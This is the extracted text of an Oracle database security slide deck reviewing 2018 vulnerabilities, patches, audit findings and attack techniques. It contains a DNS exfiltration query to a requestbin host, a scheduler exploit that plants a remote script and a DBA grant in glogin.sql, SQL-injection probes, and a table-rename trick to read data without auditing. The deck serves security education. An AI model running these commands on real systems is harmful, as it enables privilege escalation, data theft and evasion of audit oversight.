Professional Documents
Culture Documents
Best of Oracle 2018
Best of Oracle 2018
! Intro
! livesql.oracle.com
! January 2018 - November 2018
! DNS Exfiltration
! Bypass Oracle Auditing
! Outlook 2019
! Q&A
OOW 2018 & Larry’s bot army
for autonomous databases
„… modern cloud is constantly under
attack by what are called botnets…“*
„Because if they have robot attacks on
our clouds, and robot attacks in our
data centers and our government
agencies, you better have robotic
defenses…“ *
Already discussed in 2012 by Red-
Database-Security („Selfdefending
databases“**)
* https://www.foxbusiness.com/technology/oracle-is-building-a-robot-army-to-protect-data
** http://www.red-database-security.com/wp/selfdefending_databases_hashdays_2012.pdf
OOW 2018 & Larry Ellison
about Cloud Security
https://www.foxbusiness.com/technology/oracle-is-building-a-robot-army-to-protect-data
LiveSQL security
Oracle 18c testdrive
Hardened Oracle 18c with free SQL
interface
Reported to secalert@oracle.com
2 weeks later the problem was fixed
And I got a credit in the October 2018 CPU
livesql.oracle.com - Part II
< DBMS_SCHEDULER.DISABLE(M_NEW_JOB_NAME);
---
> SYS.DBMS_SCHEDULER.DISABLE(M_NEW_JOB_NAME);
" https://www.dbarj.com.br/en/2018/08/dissecting-180717-bp-psu-ru-and-rur/
" https://www.dbarj.com.br/en/2018/05/dissecting-180417-bp-psu-ru-and-rur/
" https://www.dbarj.com.br/en/2018/05/oracle-12-2-0-1-jan2018-rur-180417-or-180411/
" https://www.dbarj.com.br/en/2018/01/dissecting-180116-bp-psu-ru-rur/
Oracle Vulnerabilities 2018
Oracle Vulnerabilities 2018
* https://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html
January 2018 CPU*
" http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html
CVE-2017-10282 (CVSS 9.1)
* https://www.dbarj.com.br/en/2018/01/sql-injection-on-12c-cbview-package-finally-fixed-on-180116/
Oracle 12.x Exploit I
SQL> conn doag2017/doag2017
Connect durchgeführt.
CONNECT
EXECUTE_CATALOG_ROLE
https://www.exploit-db.com/exploits/42966/
CVE-2017-12617 (CVSS 8.1)
CVE-2017-12617 (CVSS 8.1)
CVE-2017-12617 (CVSS 8.1)
CVE-2017-12617 (CVSS 8.1)
February 2018
* https://github.com/ora600pl/rico2
** http://blog.ora-600.pl/2018/02/14/project-rico2-and-the-history-of-apex-upgrade-that-went-terribly-wrong/
Rico 2 - Open Source BBED
Oracle Transparent Data Encryption (TDE) is blocking data access via data blocks.
* https://github.com/ora600pl/rico2
** http://blog.ora-600.pl/2018/02/14/project-rico2-and-the-history-of-apex-upgrade-that-went-terribly-wrong/
March 2018
* https://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
** https://www.thatjeffsmith.com/archive/2018/04/18-1-features-sql-injection-detection/
April 2018 CPU*
* https://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
SQL Injection Detection in SQL Developer
https://www.thatjeffsmith.com/archive/2018/04/18-1-features-sql-injection-detection/
SQL Injection Detection
May 2018
* https://www.dbarj.com.br/en/2018/05/how-to-bypass-requirement-of-with-grant-option-on-views-
accessing-third-party-tables/
May 2018 - Bypass grant option
SQL> grant select on USER_B.v1 to USER_C;
grant select on USER_B.v1 to USER_C
*
FEHLER in Zeile 1:
ORA-01720: Berechtigungsoption f³r 'USER_A.T1' nicht vorhanden
SQL> conn USER_B/oracle
Connected.
SQL> CREATE OR REPLACE PACKAGE pkg_bypass_go AS
2
3 TYPE t_tab IS TABLE OF USER_A.T1%ROWTYPE;
4
5 FUNCTION run (p_sql IN CLOB)
6 RETURN t_tab PIPELINED;
7
8 END pkg_bypass_go; Use a Pipeline Function to bypass
9 /
the limitation
Package created.
SQL> CREATE OR REPLACE PACKAGE BODY pkg_bypass_go AS
2
3 FUNCTION run (p_sql IN CLOB)
4 RETURN t_tab PIPELINED
5 IS
6 l_cursor SYS_REFCURSOR;
7 l_row USER_A.T1%ROWTYPE;
8 BEGIN
9 OPEN l_cursor FOR p_sql;
10 LOOP
11 FETCH l_cursor
12 INTO l_row;
13 EXIT WHEN l_cursor%NOTFOUND;
14 PIPE ROW (l_row);
15 END LOOP;
16 CLOSE l_cursor;
17 RETURN;
18 END run;
19
20 END pkg_bypass_go;
21 /
May 2018 - Bypass grant option
If the USER_B account, who owns the view, also had the CREATE
PROCEDURE privilege, he could bypass the ORA-01720 error by
encapsulating the table T1 results on a pipelined function, and use this
function inside his view.
Grant succeeded.
June 2018
* https://mahmoudhatem.wordpress.com/2018/06/13/using-ld_preload-to-implement-a-hidden-trojan-in-an-
oracle-database/
** https://www.dbarj.com.br/en/2018/06/protecting-oracle-database-binaries-against-malicious-changes/
June 2018 - Protecting Oracle Database
Binaries against malicious changes
New Oracle 18c feature: Read-Only Oracle
Home
Ensure that no Oracle process is creating or
changing files in the $ORACLE_HOME
1. Save current permissions and owners
2. Remove privileges from OS user Oracle
3. Rollback before applying patches
June 2018 - Trojan in TNS Listener
* https://mahmoudhatem.wordpress.com/2018/06/13/using-ld_preload-to-implement-a-hidden-trojan-in-an-
oracle-database/
July 2018
* https://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
July 2018 CPU*
3 security fixes (1 remote exploitable)
* https://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
CVE-2018-3004 (CVSS 5.4)
Privilege escalation via a java deserialization vector
that bypasses built in Oracle JVM security. Proper
exploitation can allow an attacker to gain shell level
access on the server and SYS level access to the
database.
* https://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
Oracle 12.x Exploit I
SQL> conn doag2018/doag2018
Connect durchgeführt.
* https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
October 2018 CPU*
* https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
CVE-2018-7489 (Rapid Home
Provisioning)
" https://access.redhat.com/security/cve/cve-2018-7489
" https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=891614
"
November 2018
DOAG 2018
Privilege Capturing Feature free in Oracle
Enterprise Edition*,**
* http://www.petefinnigan.com/weblog/archives/00001448.htm
** https://docs.oracle.com/en/database/oracle/oracle-database/18/dblic/Licensing-
Information.html#GUID-0F9EB85D-4610-4EDF-89C2-4916A0E7AC87
End of the
annual review
DNS Exfiltration
https://blog.fosec.vn/dns-data-exfiltration-what-is-this-and-how-to-use-2f6c69998822
DNS Exfiltration
https://blog.fosec.vn/dns-data-exfiltration-what-is-this-and-how-to-use-2f6c69998822
DNS Exfiltration
SQL> select
SQL> select
utl_http.request('Live_from_DOAG2018.eeebce28d20630e3b826.d.r
utl_http.request('Live_from_DOAG2018.eeebce28d2
equestbin.net') from dual;
0630e3b826.d.requestbin.net') from dual;
FEHLER in Zeile 1:
FEHLER in Zeile 1:
ORA-29273: HTTP-Anforderung nicht erfolgreich
ORA-29273: HTTP-Anforderung nicht erfolgreich
ORA-12541: TNS: Kein Listener
ORA-12541: TNS: Kein Listener
ORA-06512: in "SYS.UTL_HTTP", Zeile 1491
ORA-06512: in "SYS.UTL_HTTP", Zeile 1491
ORA-06512: in Zeile 1
ORA-06512: in Zeile 1
SQL>
DNS Exfiltration
l_script := '
host icacls "C:
\app\orawin\product\12.1.0\dbhome_1\sqlplus\admin\glogin.sql" /
grant Users:F
host echo @http://www.red-database-security.com/beta/test.sql
>> C:
\app\orawin\product\12.1.0\dbhome_1\sqlplus\admin\glogin.sql
host echo grant dba to webuser identified by webuser; >>C:
\app\orawin\product\12.1.0\dbhome_1\sqlplus\admin\glogin.sql
';
Oracle 12.x
DBMS_SCHEDULER.create_job(
Exploit I
job_name => l_job_name,
job_type => 'SQL_SCRIPT',
job_action => l_script,
credential_name => 'oracle_ol6_121',
enabled => FALSE);
SQL> select * from dual where 1=1 and dbms_xdb_version.checkin((select user from dual))='1';
select * from dual where 1=1 and dbms_xdb_version.checkin((select user from dual))='1'
*
FEHLER in Zeile 1:
ORA-31001: Ressourcen-Handle oder Pfadname ung³ltig: SYS
ORA-06512: in "XDB.DBMS_XDB_VERSION", Zeile 30
ORA-06512: in "XDB.DBMS_XDB_VERSION", Zeile 45
SQL> select * from dual where 1=1 and dbms_xdb_version.makeversioned((select user from
dual))='1';
select * from dual where 1=1 and dbms_xdb_version.makeversioned((select user from dual))='1'
*
FEHLER in Zeile 1:
ORA-31001: Ressourcen-Handle oder Pfadname ung³ltig: SYS
ORA-06512: in "XDB.DBMS_XDB_VERSION", Zeile 3
ORA-06512: in "XDB.DBMS_XDB_VERSION", Zeile 18
* https://notwhy.github.io/2018/06/hacking-oracle/
Findings from Security Audits in
2018
Sample:
Who am I
weber
Who
oracle
Auditing SYS (with login user)
Alternative:
Logon-Trigger can read the (original) login user id from
/proc/<processid>/loginuid via an external table
and join this uid with the real name from /etc/passwd (via
external table or inline external SQL)
Auditing SYS (with login user)
su - oracle su - oracle
https://blogs.oracle.com/oraclemagazine/unify-auditing
How can we get the table data
without triggering auditing?
Alter table rename scott.emp to scott.noemp;
select * from scott.noemp;
Alter table rename scott.noemp to scott.emp;
rename scott.emp to scott.noemp;
select * from scott.noemp;
rename scott.noemp to scott.emp;
Migration to 18c/19c
Oracle Multi-Tenant